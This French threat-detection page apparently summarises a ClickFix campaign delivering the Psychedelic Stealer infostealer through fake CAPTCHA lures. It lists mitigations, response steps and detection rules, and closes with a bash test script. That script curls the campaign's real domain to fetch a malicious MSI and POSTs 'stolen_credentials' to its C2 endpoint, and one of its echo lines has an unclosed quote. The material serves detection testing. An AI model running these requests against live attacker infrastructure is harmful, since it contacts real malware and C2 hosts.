Le Voleur Psychédélique : Quand un CAPTCHA Devient un Installateur
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Arctic Wolf Labs suit une campagne qui utilise de faux leurres CAPTCHA Cloudflare injectés dans des sites Web d’entreprises ukrainiennes compromises. L’attaque de type ClickFix convainc les utilisateurs d’exécuter un package MSI qui installe Psychedelic Stealer, un voleur d’informations conçu pour collecter les identifiants des navigateurs, les jetons de compte et les données des portefeuilles de cryptomonnaie. Le logiciel malveillant prend également en charge les tâches distantes persistantes via une infrastructure C2 dédiée.
Enquête
L’enquête a révélé des iframes injectées sur des sites Web ukrainiens légitimes qui redirigent les visiteurs vers un faux flux de vérification. Les analystes ont également identifié un panneau de gestion de leurres marqué Rublevka TDS, qui contrôle les configurations de commande et enregistre la télémétrie des visiteurs. L’analyse technique de la charge utile MSI a révélé une URL de prochaine étape chiffrée ainsi que les routines principales du logiciel malveillant pour le vol d’identifiants et de données.
Atténuation
Les organisations devraient surveiller l’exécution suspecte de Windows Installer (msiexec.exe) lancé par des navigateurs Web ou des interfaces en ligne de commande. Le filtrage Web devrait bloquer les domaines malveillants connus, tandis que les défenseurs devraient également surveiller les actifs Web légitimes pour les injections d’iframe non autorisées. Renforcer les contrôles des points d’extrémité autour de la création de tâches planifiées peut également réduire le risque de persistance.
Réponse
Lorsqu’une activité de Psychedelic Stealer est détectée, isolez les points d’extrémité affectés pour arrêter toute exfiltration de données supplémentaire ou tout mouvement latéral. Auditez les profils de navigateur et le stockage local pour les identifiants compromis, les jetons d’authentification et les données de portefeuille. Examinez la télémétrie réseau pour toute communication avec une infrastructure C2 connue et inspectez les systèmes pour des tâches planifiées non autorisées ou des hôtes de messagerie natifs suspects.
Flux d’attaque
Détections
Entrée RunMRU suspecte avec des sémantiques LOLBin (via registry_event)
Tentative possible d’installation de fichier MSI distant (via la ligne de commande)
Possibles communications C2 sur HTTP vers IP directe avec port inhabituel (via proxy)
Téléchargement de fichier suspect IP directe (via proxy)
IOCs (HashSha256) à détecter : The Psychedelic Stealer : Quand un CAPTCHA devient un installeur
IOCs (SourceIP) à détecter : The Psychedelic Stealer : Quand un CAPTCHA devient un installeur
IOCs (DestinationIP) à détecter : The Psychedelic Stealer : Quand un CAPTCHA devient un installeur
Détection de l’accès à l’infrastructure de Psychedelic Stealer [Serveur Web]
Exécution de simulation
-
Narratif de l’attaque & Commandes : L’adversaire vise à infecter une cible via un mécanisme CAPTCHA faux. La simulation imitera le comportement du navigateur de la victime : d’abord, en naviguant vers la page de destination de l’attaquant pour contourner la surveillance initiale, puis en demandant la charge utile MSI malveillante, et enfin, en initiant une connexion C2 via un POST HTTP vers le script de contrôle de l’attaquant. Cette séquence est conçue pour imiter les schémas URI exacts identifiés dans l’infrastructure de Psychedelic Stealer.
-
Script de test de régression : Le script suivant utilise
curlpour simuler les trois étapes distinctes de la logique de détection.#!/bin/bash # Script de simulation pour l'accès à l'infrastructure de Psychedelic Stealer TARGET_DOMAIN="uasputnik.com" echo "[+] Simulation de l'infrastructure de Psychedelic Stealer... # Étape 1 : Simuler la visite de la page de destination (Sélection 1) echo "[*] Simulation d'une requête GET vers la page de destination..." curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null # Étape 2 : Simuler le téléchargement du MSI malveillant (Sélection 2) echo "[*] Simulation d'une requête GET pour la charge utile..." curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null # Étape 3 : Simuler une communication C2 via POST (Sélection 3) echo "[*] Simulation d'une requête POST vers le point C2..." curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null echo "[+] Simulation terminée. Vérifiez les alertes SIEM." -
Commandes de nettoyage :
# Comme il s'agit d'une simulation basée sur le réseau, aucun fichier n'est créé sur le système local # sauf sur demande spécifique. Aucun nettoyage requis pour le système de fichiers local. echo "[+] Nettoyage terminé."